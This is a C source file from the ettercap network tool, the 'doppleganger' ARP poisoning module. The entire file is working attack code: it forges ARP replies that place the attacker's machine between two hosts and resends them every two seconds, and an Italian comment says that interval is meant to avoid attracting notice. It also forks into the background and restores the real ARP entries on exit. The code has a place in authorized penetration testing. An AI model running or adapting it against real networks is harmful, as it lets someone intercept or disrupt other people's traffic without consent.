/*
    ettercap -- doppleganger -- the ARP poisoner

    Copyright (C) 2001  ALoR <alor@thepentagon.com>, NaGA <crwm@freemail.it>

    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
*/

#include <stdio.h>
#include <sys/time.h>
#include <signal.h>
#include <sys/ioctl.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <errno.h>

#include "include/ec_main.h"
#include "include/ec_inet.h"
#include "include/ec_inet_forge.h"
#include "include/ec_inet_structures.h"

#ifdef DEBUG
   #include "include/ec_debug.h"
#endif


// global data
u_char *buf1, *buf2;

char PoorMAC1[6];
char PoorMAC2[6];
char PoorIP1[16];
char PoorIP2[16];
int sock;

char MyMAC[6];       // my MAC address

// protos...

void Doppleganger_reARP(int dummy);
int Doppleganger_Run(char *iface, char *IP1, char *IP2, char *MAC1, char *MAC2);
int Doppleganger_Main(char *iface, char *IP1, char *IP2, char *MAC1, char *MAC2);

// ----------------------------

void Doppleganger_reARP(int dummy)        // turns back the ARP cache...
{
   int i;

#ifdef DEBUG
   Debug_msg("Doppleganger_reARP");
#endif

   Inet_Forge_ethernet( buf1, MyMAC, PoorMAC1, ETH_P_ARP );
   Inet_Forge_ethernet( buf2, MyMAC, PoorMAC2, ETH_P_ARP );

   // legal ARP reply :)

   Inet_Forge_arp( buf1+ETH_HEADER, ARPOP_REPLY,
                   PoorMAC2, inet_addr(PoorIP2),
                   PoorMAC1, inet_addr(PoorIP1) );

   Inet_Forge_arp( buf2+ETH_HEADER, ARPOP_REPLY,
                   PoorMAC1, inet_addr(PoorIP1),
                   PoorMAC2, inet_addr(PoorIP2) );

   for(i=0; i<5; i++)
   {
      Inet_SendRawPacket(sock, buf1, ETH_HEADER + ARP_HEADER);
      Inet_SendRawPacket(sock, buf2, ETH_HEADER + ARP_HEADER);
      usleep(1000);
   }

   exit(0);
}



int Doppleganger_Main(char *iface, char *IP1, char *IP2, char *MAC1, char *MAC2)
{
   int MTU;

#ifdef DEBUG
   Debug_msg("Doppleganger_Run -- %s %s %s %s", IP1, IP2, MAC1, MAC2);
#endif

   strcpy(program_argv0, "dopplega");

   Inet_DisableForwarding();

   Inet_GetMACfromString(MAC1, PoorMAC1);
   Inet_GetMACfromString(MAC2, PoorMAC2);

   strncpy(PoorIP1,IP1, 16);
   strncpy(PoorIP2,IP2, 16);

   sock = Inet_OpenRawSock(iface);

   Inet_GetIfaceInfo(iface, &MTU, NULL, MyMAC, NULL, NULL);

   buf1 = Inet_Forge_packet( ETH_HEADER + ARP_HEADER );
   buf2 = Inet_Forge_packet( ETH_HEADER + ARP_HEADER );


   // frame ethernet header
   Inet_Forge_ethernet( buf1, MyMAC, PoorMAC2, ETH_P_ARP );
   Inet_Forge_ethernet( buf2, MyMAC, PoorMAC1, ETH_P_ARP );

   // fake arp replies
   Inet_Forge_arp( buf1+ETH_HEADER, ARPOP_REPLY,
                   MyMAC, inet_addr(PoorIP1),
                   PoorMAC2, inet_addr(PoorIP2) );

   Inet_Forge_arp( buf2+ETH_HEADER, ARPOP_REPLY,
                   MyMAC, inet_addr(PoorIP2),
                   PoorMAC1, inet_addr(PoorIP1) );


   signal(SIGINT, Doppleganger_reARP);
   signal(SIGTERM, Doppleganger_reARP);
   signal(SIGSEGV, Doppleganger_reARP);

   // sends the fake replies
   loop
   {
      if (getppid() == 1) Doppleganger_reARP(SIGTERM);

      Inet_SendRawPacket(sock, buf1, ETH_HEADER + ARP_HEADER);
      Inet_SendRawPacket(sock, buf2, ETH_HEADER + ARP_HEADER);

      sleep(2);   // Evitiamo di dare nell'occhio trasformando l'hub in un albero di Natale ;)
   }

   return(0);

}



int Doppleganger_Run(char *iface, char *IP1, char *IP2, char *MAC1, char *MAC2)
{
   int Dopple_pid;

   if (!(Dopple_pid = fork()))
      Doppleganger_Main(iface, IP1, IP2, MAC1, MAC2);
   else
      return Dopple_pid;

   return 0;
}

/* EOF */
